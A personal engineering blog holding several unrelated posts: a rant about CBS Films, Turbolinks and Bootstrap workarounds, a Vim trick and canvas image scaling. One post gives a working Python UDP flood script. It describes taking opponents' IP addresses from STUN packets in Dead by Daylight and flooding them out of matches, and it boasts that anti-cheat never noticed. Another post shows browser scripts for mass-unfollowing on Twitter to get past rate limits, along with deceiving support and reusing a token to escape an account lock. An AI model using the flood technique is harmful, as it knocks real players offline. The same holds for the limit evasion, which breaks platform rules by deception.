Dan Bradbury

Ramblings, rants, and musings of an engineer

‘Mediocrity in Movies (Part 1)’

I’ve been trying to make sense of the wave of mediocore movies, games, and music that has been dumped on us lately. This will be part 1 of a series of rants dedicated to mediocrity.

The Question

Why the hell are studios making these trash movies with famous actors and no substance?

Obviously good movies are going to make money, think defining films/classic movies (Dirty Harry, Fast Times at Ridgemont High, insert any movie that you’ll never forget here). But what happens when bad movies start to make money and become repeatable successes in the eyes of the studio execs. Whether you are making a modern classic or a pile of trash like Piranhas 3D it takes money to give the project life (and various degrees of effort).

Since the studio is so powerful in the production of films I want to take a look at a failry young studio that caught my eye while watching the playoffs this weekend. CBS Films. For some reason I was unaware that the monster that is CBS ever had a movie studio that was actively producing films and it took a stupid movie like Partiots Day to alert me to the fact. Since I was watching football on CBS and saw an ad for CBS Films something smelled fishy and I decided to do some wiki-researching

follow the money

CBS Films was founded in 2007 with the goal of producing 4-6 movies, each with a budget of $50 million (big boss says you have a yearly budget of $300 million). If you want to read a more detailed year-by-year summary for the studio the wiki#CompanyHistory does a good job. The TLDR; is they aren’t the best movie studio out there and are looking for help from others who have lead successful ventures like Lionsgate.

Before I get ahead of myself, it’s important to review history and understand that CBS tried out film production before with Cinema Center Films(1967-172). They released films like With Six You Get Eggroll (this is 1968 so you best believe that is a derogatory reference an Asian character who is in a single scene). They did hit a few winners with Snoopy, Come Home (people who love Peanuts do enjoy it) + others like Scrooge and Little Big Man w/ Dustin Hoffman. Checkout the full filmography and see if you recognize any before they closed up shop

Alright now that we know that CBS has been interested in owning a studio for some time we can start to understand why they are making such shitty films every year. I’m fully convinced that CBS is not in the business of making good movies but in it to make profitable films which tends to translates to the sub-par movies they continuously release. For a studio like this with multiple TV networks marketting seems like a sure-fire way to get people to pay up for tickets. This is apparent to anyone who had to watch TV while they were advertising Patriots Day. If this movie makes money it will be an instant-success and the studio will look to repeat the action with another close-to-home act of terror

Even a broken clock is right 2 times a day.

In the case of film studios they occassionally will put out a good movie (not because thats what they do but by being in the right place at the right time + having funds to allow a talented director make a film). So let’s take a look at the full list of movies they’ve made over the past 9 years

Release Date Title Budget Gross(worldwide)
Jan 22, 2010 Extraordinary Measures $30 million $15.1 million
April 23, 2010 The Back-up Plan $35 million $77.5 million
November 24, 2010 Faster $24 million $35.5 million
January 28, 2011 The Mechanic $40 million $51 million
March 4, 2011 Beastly $17 million $28.8 million
February 3, 2012 The Woman in Black $13 million $127.7 million
March 9, 2012 Salmon Fishin in the Yemen $14.5 million $34.6 million
September 7, 2012 The Words $6 million $13.2 million
October 12, 2012 Seven Psychopaths $15 million $23.5 million
March 1, 2013 The Last Exorcism Part II $5 million $15.2 million
May 31, 2013 The Kings of Summer unknown $1.3 million
July 26, 2013 The To Do List $1.5 million $3.9 million
November 1, 2013 Las Vegas $28 million $134.4 million
December 6, 2013 Inside Llewyn Davis $11 million $13 million
April 4, 2014 Afflicted $318,000 $121,200
April 25, 2014 Gambit unknown $14.2 million
August 15, 2014 What If $11 million $7.8 million
September 26, 2014 Pride unknown $16.7 million
February 20, 2015 The Duff $8.5 million $43.5 million
November 13, 2015 Love the Coopers $24 million $41.1 million
March 25, 2016 Get a Job unknown unknown
April 12, 2016 Flight 7500 unknown $2.8 million
August 12, 2016 Hell or High Water $12 million $31 million
October 7, 2016 Middle School: The Worst Years of My Life $8.5 million $20.7 million
December 21, 2016 Patriots Day $45 million We shall see

16/24 movies being profitable seems like they have hit their mark but the remaining were either flops or the studio decided not to release how much the movie cost to make. I assume this is because they spent so much and the movie did so poorly; take a look at Flight 7500, a Sci-Fi/Horror movie with Amy Smart that was barely passable and only made $2.8 million. It was planned for release in 2013 but was pulled and later turned into a on-demand release in 2016. The studios won’t say how much they spent on the film which makes me believe they spent a pretty penny to make a pile of shit. Luckily for CBS Films, any flop that they haven’t over marketted can be turned into a release on Showtime or one of their other movie networks.

pile of trash that CBS fumbled with for 4 years before dumping to on-demand

The most profitable film for the Studio was The Woman in Black which had Daniel Radcliffe in it so every Harry Potter fanboy who could stand a horror film ran to see it around the world. For anyone who saw the movie it wasn’t anything amazing but definitely not a bad movie. A beefy marketing campaign focused on showing Radcliffe’s face as many places as possible helped push a mediocore film into a money making machine for the studio.

After that successful movie the studio remained focused on having recognizable actors in lead rolls for the majority of films they were willing to put their money behind (with the exception of a few failed experiments). For the most part the formula makes money and they continue to make movies with a deep investment in the stars they hire + marketing campaigns to make sure everyone knows Actor X and Y are in Movie ZZZZZZ and the trailer looks good. This exact formula is the rational for making a movie like Patriots Day; it ticks all the boxes of human interest, actor is very recognizable, and its easy to market. So I guess this makes sense for a studio thats all about the money.

My hope is this movie is a complete flop and the studio eventually caves like its predecessor Cinema Center Films. I know its unrealistic to hope for a future where money doesn’t control what gets made but Im optimistic as a consumers we can start sending clear messages that we are tired of this shit storm. I’m hopefull we can get more movies like Fast Time at Ridgemont High that are truly excellent at what they are trying to do. Otherwise we should brace ourselves for the onslaught of mediocraty and be ready for more iterations of Final Destination and whatever marketers know will sell to the general popluation

Exploiting P2P Game Hosting in Dead by Daylight

Any gamer will tell you dedicated servers are prefered to someone being selected as the host and having an unfair advantage with much better latency. P2P online gaming is just awful for anyone who wants a true competetive environment; clients must maintain a connection with the host and if the host leaves the game ends? graceful transfer? (who knows until it happens) + bullshit like the following POC is too damn easy to pull off for anyone who has basic Python abilities.

If you haven’t heard about DbD I’d actually highly recommend the game + give props to the creators for making a fun and original multi-player survival horror game (Steam link). The basic idea of the game is that 4 players are Survivors, responsible for repairing generators and escaping from the graps of the Killer (another player whos goal is to hunt and kill as many Survivors as they can before they all run to safety). Simple idea but really enjoyable if you can get a group of friends and try to survive together / enjoy messing with folks as a killer.

Since the game was made by a very small team there was a wave of complaints and issues in the early days. Once more and more networking issues were being reported/experienced I had to pop open Wireshark and see what was going on.

I joined a game and waited for the load screen to start the Wireshark capture. As soon as the game started you could see the flood of UDP packets + our trusty friend STUN (in this case CLASSIC-STUN but the ideas are the same) and I knew we’d be able to have a little fun

For those of you who might not be familiar with the STUN protocol here’s a quick review:

Session Traversal Utilities for NAT (STUN) is a protocol that serves as a tool for other protocols in dealing with Network Address Translator (NAT) traversal. It can be used by an endpoint to determine the IP address and port allocated to it by a NAT. It can also be used to check connectivity between two endpoints, and as a keep-alive protocol to maintain NAT bindings.

Who is sending / receiving these packets?

STUN Client: A STUN client is an entity that sends STUN requests and receives STUN responses. A STUN client can also send indications. In this specification, the terms STUN client and client are synonymous.

What info do we care about in the packet?

1
2
3
4
MAPPED-ADDRESS:
  - Protocol Family: IPv4
  - IP: 192.168.0.1
  - Port: 53199

This is all you have to know about to follow along but if you are interested in knowing more about STUN check out RFC 5389

Each player is acting as a client and is handling both requests and responses to maintain a connection to the other players in the game. If we listen to the traffic we have access to a public IP and port that is open for communication (to confirm just watch UDP packets transportation either way)

Imagine a simple script that listens STUN headers and generates a list of victims and runs a simple UDP flood

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import socket
import random
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1024)

victim = input('Target >')
vport = int(input('Port >'))

packets_sent = 0
while 1:
  client.sendto(bytes, (victim, vport))
  packets_sent += 1
  if packets_sent % 100 == 0:
      print('.', end=' ')

and the victim is pwnd.. 🎉

In the case of DbD the victim is flooded out of the game and points are given to the killer.

As the killer (hosting the game) you can target players with a simple test flood (watch them skip and shut it off before they are out of the game) and then D/C them if they are near escaping (giving the player 0 points and rewarding the killer for a successful kill).

As the survivor you can periodically flood the killer when he is chasing to make sure he cant hit you while you juke / escape his grasp (why not flood and wiggle at the same time?) or you can lag out your fellow survivors to pick up a particularly nice item they are running that game (too funny to lag out a friend who is bragging about some sick item he is going to run this game).

The main point I’m trying to make is that this is a simple simple attack that can be pulled off by any jobber with minimal skill.

In my testing a simple UDP flood like the one shown above using the STUN response results was 100% effective no matter when the flood was run (port remained open for entirety of game and then some..). I ran tests for hours at a time and spaced it out over months of gameplay to see if EAC was every going to pick up on this obivous attack… they never did. In fact EasyAntiCheat will not detect attacks like this (tested in other games they “secure”) + is generally a shit given waht they promise.

TLDR; Networking is difficult and gets messed up often. If something feels poorly implemented chances are it is and there could be some fun to be had understanding whats going on under the covers.

Unnecessary Noise in the Programming Community

Growing up on the internet I’ve always been aware of trolling and general BM that are associated with competetive gaming and message boards. Unfortunately I’ve been noticing similar behavior in more and more projects & programming community sites. It seems too common to run into a SO post with a comment section like this

The example code is a bit tricky to digest on first pass + is written in bad vimL (see his answer + my correction if interested). Even if the question was dumb and pointless there is no reason to be a dick for no reason. It just creates unnecessary noise that does nothing but deter from the goal at hand. We should look to previous failures like rubyspec and try not to bring whatever shit is going on in our lives into the project. If you really need to blow off steam none of us mind if you go play some Overwatch and chill out a little bit before working on the next issue.

For those of you who didnt follow along at home with the drama around rubyspec here are a few links + a running repo of github drama links - HN on MRI and RubySpec issues - Some #rubinius BM - github-drama

Rule 97: Don’t be a dick

Turbolinks and Anchors

So far my journey with turbolinks hasn’t been too bad; I write my slop and things work as I’d expect them to. I knew this streak of good luck was bound to come to an end at some point and today is the day.

I had the misfortune of attempting to implement simple anchor tags. At first I thought I had made a typo but upon checking my code everything was fine. Another test and I noticed the damned .turbolinks-progress-bar appearing onclick. It was clear turbolinks had mistook my anchor link and was intercepting the click like it should be doing with other links. Things got strange when adding data-no-turbolinks yielded the same results..

After googling I found a closed issue that had apparently been resolved. Checked my turbolinks version and we’ve got the latest and greatest. Hastily closed issue back in 2014 leads us to the same issue in present day. There’s a bit of discussion on the issue but doesn’t look like anyone has offered a PR to resolve the issue :(

There are a few snippets to override the default behavior that could prove useful but this is something that I’d expect the turbolinks to have ironed out.

Because I don’t mind writing an onclick for the links I’ll probably implement something like this for a similar effect

1
$('html, body').animate({scrollTop: $('#anchor').offset().top}, 'slow')

I’m definitely disappointed in turbolinks for failing me on this instance but will continue on this less travelled mysterious path DHH wants me to believe in.

Vim Tricks - Googling With Keywordprg

Most vim users are familiar with the man page lookup; K under the cursor or on visual selection. For anyone who needs a quick refrersher lets take a look at the help docs (help :K)

1
2
3
4
5
6
7
8
9
          *K*
K     Run a program to lookup the keyword under the
  cursor.  The name of the program is given with the
  'keywordprg' (kp) option (default is "man").  The
  keyword is formed of letters, numbers and the
  characters in 'iskeyword'.  The keyword under or
  right of the cursor is used.  The same can be done
  with the command
    :!{program} {keyword}

So we can see that the default program (keywordprg / kp) is defaulted to “man” and the keyword is determined by what is right under the cursor when it is used. The other important thing to not is the fact we could invoke man or whatever program we want using :!program_name but that’s not as fun as reconfiguring the default behavior to do what we want.

Let’s imagine that for some reason we find ourselves copying sections of text and searching google for the results. Rather than doing this over and over why not just change the keywordprg to a custom bash script to do what we want. First thing’s first lets write a simple bash script to open up the browser (I assume every OS has some way to open a browers with a given URL; This is written on an Ubuntu machine but if I were on a Mac I’d use open and test / google to make sure the syntax works as expected)

1
2
#!/bin/bash
firefox "https://www.google.com/serach?q=$1"

Give it a handy name like googleShit, move it into your PATH and and pop open that ~/.vimrc to change your default keywordprg

1
set keywordprg=googleShit

And now when you use K inside a new vim session you will be googling contents rather than looking up the man pages! If you find yourself repeating a task under the cursor or in visual mode pretty handy trick to have in the utility belt. Use a little imagination and you can come up with something to improve your daily workflow.

Different Browsers Are the Worst

While working on a personal project I ran into an issue with a bootstrap navbar collapse. In my local testing everything went fine and I decided to push and hoped everything would behave properly.. I grab my iPhone 5 and take a look only to see that the dropdown is not working at all.

After doing some googling I came across a SO post that accurately described the shitty situation I found myself in (the dropdown working in all browsers (including IE) and failing on all iOS devices)

The guy was apparently using a <a> tag without the href attribute which would fail to trigger the collapseable menu. That’s all fine and good but I’m trying to use a span and am too lazy to wrap my one line in a tag so I hunt for a better solution..

My original (almost functional code) trigger looks like this

1
<span class="glyphicon glyphicon-menu-hamburger navbar-toggle" "style"="color:white;", "data-toggle"= "collapse", "data-target"=".navbar-collapse" />

Can you spot what’s missing with this simple data-toggle? It turns out you need to add cursor: pointer to the style of whatever the element might be..

If the majority of people are usin links and buttons to trigger collapsable content then everything will work as expected and no problems will be had. For people who do what they want there’s shit like this to deal with.

And that’s the web for you. Use some CSS/JS library like Bootstrap in hopes of saving yourself time and then tackle random shit like this. For the novice I’d imagine this would be an aggravating roadblock that would make hault all progress for a few solid hours until they give up and use a button or link to accomplish the same thing as adding the cursor: pointer styling.

If you want to do work with web applications enjoy things like this because this is what we deal with on the daily.

Into the Abyss With Turbolinks

Previous attempts to adopt turbolinks during upgrades or new projects led me to the conclusion that I have a burning hatred for everything the project stands for (rage hatred is the worst kind..). From conversations with other Rails folks + former CTOs it seemed like turbolinks was something I could avoid without batting an eyelash (see comparisons to Windows 8 decision making or just ask a local Rails expert what their experience with turbolinks has been like)

As someone who previously ignored the efforts being made by DHH and the core team I would just start a new project with --skip-turbolinks to ensure my own sanity and continue with the hammering.

Since I’m a bit late to this conversation it’s nice to read posts like Yahuda Katz’ problem with turbolinks and 3 reasons why I shouldn’t use Turbolinks to get my hopes and dreams crushed.. Here is just the beginning of the headache that one can look forward to if they are to continue down through the thorns

Duplicate Bound Events

Because JavaScript is not reloaded, events are not unbound when the body is replaced. So, if you’re using generic selectors to bind events, and you’re binding those events on every Turbolinks page load. [This] often leads to undesirable behavior.

Alright so to be honest this isn’t that bad. People can bitch about global state all they want but as someone who enjoys thinking in a “game loop” I don’t mind this and feel like I can easily write my own code to these standards

Audit Third-Party code

You audit all third-party code that you use to make sure that they do not rely on DOM Ready events, or if they do, that they DOM Ready events are idempotent.

And this is where it starts to get fun.. I just stumbled upon a bug that reared its head beacuse of these two issues and I wanted to post a solution that I may find myself using more moving forward..

Imagine we are using typeahead.js we want to go ahead and initialize our typeahead input on a given page. Here’s what the JS might look like

1
2
3
4
5
6
7
8
9
  $('#searchBar .typeahead').typeahead({
    hint: true,
    highlight: true,
    minLength: 2
  },
  {
    name: 'estados',
    source: matcher(items)
  });

A pretty harmless call that you are probably going to copy paste in to try the first time you mess with typeahead.js. It works and you move on.. But be careful because turbolinks will give you some intereseting behaviour if we navigate between the page that has this piece of JS and another page. .

Turbolinks will invoke this each time the page is “loaded”. Because of this we will spawn a new instance of the typeahead input and the associated hint div.. For some reason (one I don’t care to look into) typeahead.js will spawn a new instance and hide the others rather than truly cleaning up. No matter what we are left to fend for ourselves in the wilds of turbolinks so we search for a solution.

I figure we can just handle global state a little better than your typical inline JS would. To do this we simply wrap the initializer in a conditional to verify the number of typeahead divs that are present on the screen. With proper naming we should be able to expand this approach to multiple typeahead instances.

1
2
3
4
5
  if($('.typeahead.tt-input').size() < 1) {
    $('#searchBar .typeahead').typeahead({
      ...
    }
  }

With that extra check we are able to handle the global state that turbolinks will create when natrually navigating and attempting to speed up our page.

A recent webcast featuring DHH got me thinking about how simple the problem of a web application really is. The server demands are not a problem whatsoever (30ms response times are all you need to be perfect anything lower is not truly noticable or necessary). We have an issue when it comes to how the rest of the “page-load” occurs for the user.

We all know the “hard refresh” links, the ones that clearly jump you to a new page with new content. Loading a new page is the same old same old that we’ve been doing since we could serve shit up. Of course the new way is the “one page app” that allows the user to navigate without ever having to disengage from the page they were on. IMO the trend is getting a bit insane (always felt the JS community was a bit heavy handed with trying new things..) and trying to keep up with the latest quarrels and trends is tiring. Where is the solution to the seamless application?

It’s clear that some will say Ember or React are the way forward to building beautiful apps that will take over the world but I’m not sure I believe a JS Framework is what will carry an application. So why learn all that unecessary complexity when HTML5 is here?

If Turbolinks lives up to the into of the README I will be a happy Rails camper.

Turbolinks makes navigating your web application faster. Get the performance benefits of a single-page application without the added complexity of a client-side JavaScript framework. Use HTML to render your views on the server side and link to pages as usual. When you follow a link, Turbolinks automatically fetches the page, swaps in its , and merges its , all without incurring the cost of a full page load.

C’mon Turbolinks don’t let me down again..

Development Turntable

And the turntable keeps on turnin’ and turnin’ Nothing can fuck with the way it goes around - Slug

Human nature tells us that there is a natural desire to make sense of the uncertain and create some semblance of control in our lives. This fundamental desire to create order where chaos thrives is the entire struggle of every growing company and the realization that always occurs when a company begins to grow past its infancy/adolescence. You know a company is in this phase when the Operations side wants to throw X engineers at the problem in hopes that it will increase effiency and get us to that cash cow ASAP (a different can of worms for another time)

When I was introduced to SCRUM in the real world I was blown away with the organization that seemed to be instilled throughout a company of ~20 engineers (the largets team I had worked with at the time) and >100 in all departments. Communication seemed to be streamlined and the pace of development seemed like it was pushing limits and allowing the team to move at the maximum velocity.. As a disclaimer I still am a believer in some system like SCRUM (loose-SCRUM) to keep visibility in a minimal way but I’d like to rethink the “optimal development cycle”

Whenever I think about business I am a bit cynical after seeing a company be sold with very little transparency to the <10 employees in the ranks. Because of past experiences with companies and individuals who have reneged on contracts and payments I like to assume the worst case when thinking in the hypothetical.

Let’s imagine a company that has just gone through a big round of funding and is now ready to make the push from 150 employees to 300+ w/ multiple offices around the United States to house all the talent that they have. This company is going places and they are in control of their destiny. Development team is churning out features left and right and the folks in Operations and Sales are able to keep customers happy and sign new customers with ease. In our ficticious company we have happy employees in every aspect of the business.

Now what happens when a Sales manager gets word that the company can sign the biggest contract ever by orders of magnatiude that make

To be continued..

Scaling Images With HTML5 Canvas

Had intented to post this 8 months ago but it got lost in the sea of gists..

This is old news by now for most but I had quite a bit of fun implementing it for myself and figured I’d share my code and some learnings that came along with it. The basic idea is to use canvas to render an uploaded image and then utilize the toDataURL method on canvas to retrieve a Base64 encoded version of the image. In the example included here we will just direct link to the newly scaled image but you could imagine that we kick off an ajax request and actually process the image (in PHP base64_decode FTW). Without any more tangential delay let’s take a look at the code.

1
2
3
4
5
6
7
8
9
10
11
<input type="file" accept="image/*" id="imageFile" />
<table>
  <tr>
    <td>Width: <input type="text" id="width" value="200" style="width:30; margin-left: 20px;" /></td>
  </tr>
  <tr>
    <td>Height: <input type="text" id="height" value="200" style="width:30; margin-left: 20px;" /></td>
  </tr>
</table>
<canvas id="canvas" style="border: 1px solid black;" width="200" height="200"></canvas>
<button width="30" id="saveImage">Save Image</button>

The above HTML shouldn’t need any explanation but if it does feel free to open the attached JSFiddle to get a feel for it..

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
(function(){
  (function(){
      document.getElementById("imageFile").addEventListener("change", fileChanged, false);
    document.getElementById("width").addEventListener("keyup", sizeChanged, false);
    document.getElementById("height").addEventListener("keyup", sizeChanged, false);
    document.getElementById("saveImage").addEventListener("click", share, false);
  }());

  var currentImage,
    canvas = document.getElementById("canvas");

  function sizeChanged() {
    var dimension = this.id,
        value = this.value;
    canvas[dimension] = value;
    if(currentImage) { renderImage() }
  }

  function fileChanged() {
    var file = this.files[0],
        imageType = /^image\//;

        if (!imageType.test(file.type)) {
          console.error("not an image yo!");
        } else {
          var reader = new FileReader();
          reader.onload = function(e) {
            currentImage = e.target.result;
            renderImage();
          };
          reader.readAsDataURL(file);
        }
  }

  function renderImage() {
    var data = currentImage,
      image = document.createElement("img");
    image.src = data;
    image.onload = function() {
        context = canvas.getContext("2d");
      context.drawImage(this, 0, 0, canvas.width, canvas.height);
    }
  }
  function share() {
      document.location = canvas.toDataURL();
  }
}());

In order to bring the HTML to life we need to attach a few EventHandlers and define some basic functionality. The first things to tackle is the actual file upload.

The File API has been added to the DOM since HTML5 and will be used here to open the uploaded file from <input type="file"> on the "change" event. Inside of the change event there are 2 things that we want to do; (1) confirm the file type, and (2) render the file onto the canvas. The confirm the file type we can use the MIME type given to use from file.type and do a simple regex test (/^image\//) before attempting to render the unknown file (Even though we’ve added accept="image/*" inside the input that can be easily modified to attempt to upload any file). Once we are convinced that the user has uploaded an image it’s time to read the file and send it off to the canvas to render. FileReader’s readDataAsURL will allow us to process the file asyncronously and allows for an onload callback that gives us the ability to set the newly read image and ask the canvas to draw.

Additional Reading

Playing the Twitter-game

I am not a marketer not do I have any real prior experience managing PR/social media for a company of any size. This is just a write-up of some of my learnings while out in the wild

By all accounts I am a Twitter novice; I joined a few years ago but don’t really keep up with it (rage tweet a politician or media personality from time to time but not much more). From other business ventures I’ve learned that having a strong presence on Twitter+Facebook can be a great way to drive traffic to your site and keep folks updated with any updates but I had never invested any time in growing the profiles (outside of word of mouth and the usual social links in the footer of a site). For my most recent project I decided to take an active role in the growth of my Twitter account and to attempt to use a few of these automation tools / API to make my life a little easier.

I started the journey by trying out a product called ManageFlitter.com; I had gone all in and decided to buy the smallest plan they offered to maximize my “strategic follows”. After about 2 days of bulk requesting it becamse obvious that the “snazzy dashboard” views were nothing more than a facade.. I was hitting rate limits and unable to process a single follow / request with the access grant I had enabled for the site.

At this point I started angrily emailing support to figure out why I was being blocked without hitting any of the actual API / request limits listed in the twitter guidelines. Here is the initial diagnosis I recieved (steps to fix are omitted since they were useless..)

Thank you for writing into ManageFlitter support on this. Unfortunately Twitter seems to have revoked some 3rd party app tokens over the last few weeks. This causes “invalid or expired token” in the notifications page and keeps your account from being able to process actions, post tweets into Twitter, or from allowing your ManageFlitter account to properly sync with Twitter.

Hmm so at this point I was frustrated because there is no way my token should have been revoked! Obviously they were using keys so that they could make these “analytic queries” on the twitter user base and had messed something up on their end that had made it impossible to proceed. I pressed along that line of thinking and received the following “helpful” response.

I am sorry to hear this. There seem to be a small group of Twitter users currently having this issue with ManageFlitter and some have noted that once their account is revoked, it is far easier for their account to continue to be revoked afterwards.

Some users have suggested that waiting 24 hours helps reset the account. Others have noted that the amount of actions they perform in sequence also matters greatly to avoid the revoked access. Some have noted that after they perform 100 clicks, if they wait 20-30 seconds (usually enough time to go to the Notifications page and see if Twitter is revoking access), then continuing to perform more clicks.

There is no particular reason why some accounts are being affected and other are not. We have been in touch with Twitter and unfortunately Twitter haven’t offered much in the way of remedy for us or our users.

TLDR; I was told to wait for the problem to fix itself..

This threw a massive wrench in my plans to bulk follow people inside the industry and hope that some percentage of them would follow me back. After a few more angry emails I was told to just wait it out.. At that moment I pulled out the classic "I will have to proceed with a claim to Paypal / the better business bureau" argument to get my money back and move on with another option.

After getting my money back I decided to ride the free train with Tweepi which had no problems for the first week of usage so I decided to buy a month of the lowest tier to use some of the analytics / follow tools that were being offered. With 2 weeks on the platform I can say that I’m very happy with what I paid for and will continue to use it in the future (until my follower count levels out a bit)

So why am I writing this article if I am just using a service to accomplish the task for me? While Tweepi does a lot for me it still imposes artificial limits on follow / unfollow in a 24 hour period. (see pic below)

You can see that the service has some limitations. The main one being that I can follow more people than I can unfollow in a given day. While that makes sense with Twitter’s policies my goal is a raw numbers game where I’d like to follow as many people as possible in hopes they follow me back. Whether they follow me back or not I am content to unfollow and continue with my following numbers game.

Through this process I was able to drive my followed count up quite a bit (considering my actual follower count)

but still had this problem of the unblanaced follow:followers that I wanted to correct. If I was active on Tweepi there was no way for me to drive this down without having to completely stop following people for a period while I unfollowed the max every day.

So today I decided to have a little fun inside the browser and see what I could do. :grin:

Since twitter has a web + mobile application I could obviously sit and click through each of the people I was following to reduce the number but..

So let’s see how well formatted the twitter follower page is (and since it’s Twitter we know its going to be well organized). When arriving at the page we see the trusty un/follow button for each of the followers

we also notice that twitter has some infinite scroll magic going on to continuous load the 1000s of people we follow. With that knowledge in our hands it’s time to craft some Jquery flavored code to do the clicking for us

1
2
3
$.each($('.user-actions-follow-button'), function(value,index) {
  $(index).click();
});

Pretty easy to click through each of the buttons on the page but that’s only going to account for the ones we have manually scrolled through.. Not sufficient since we have >4000 but <20 buttons on the page. So let’s handle that damned auto-scrolling

1
2
3
4
5
6
7
8
9
var count = 0;
function st(){
  $("html, body").animate({ scrollTop: $(document).height() }, "fast");
  if(count < 2000) {
    count += 1;
    setTimeout(st, 500);
  }
}
st()

You might be thinking; why not just for loop this shit?! The scroll animation needs a bit of time to allow for the page load; if you call it too fast the entire page will bug out and the “click button” code wont work as expected. So we just use setTimeout and let that sucker run (good time to take a stretch or make some coffee). When you come back you should hopefully be at the bottom of the screen (wait for GridTimeline-footer to show up and you know you are done) :D

Run the click code and patiently wait for your browser to slow down drastically and eventually unfollow your entire list. The result should look something like this

The 1 follower there through me off since when I clicked on the link for my followers there wasn’t anyone listed. At this point I was suspicious that I may have set off one of the limits that would have deactivated my accounts. I checked my emails and didn’t see any warnings or notifications from Twitter but did start seeing this whenever I tried to follow someone on their website. (Learn more here)

At this point I was thinking I just fucked myself and got my account banned or locked in some way. During this time of panic I decided to refresh my browser and saw some funky behavior on my profile page….

No “Following” count at all?! And I cant follow anyone because of some unknown policy breach..

After writing a short sob story to Twitter about how I had “accidentally unfollowed everyone”(cover my ass) I thought about the locking problem a bit more..Hmmm what about that Tweepi token I was using before? Who would have guessed that it would work and allow me to follow people again!

So with a little bit of crafted Javascript I was able to drop that Following count down without having to fight any artificial limits imposed on me by some third party. I’m incredibly happy with the results (as I am not banned and my account is working as expected) and plan to reproduce with another client in the future.

It’s always a good feeling when adding a new tool to the utility belt.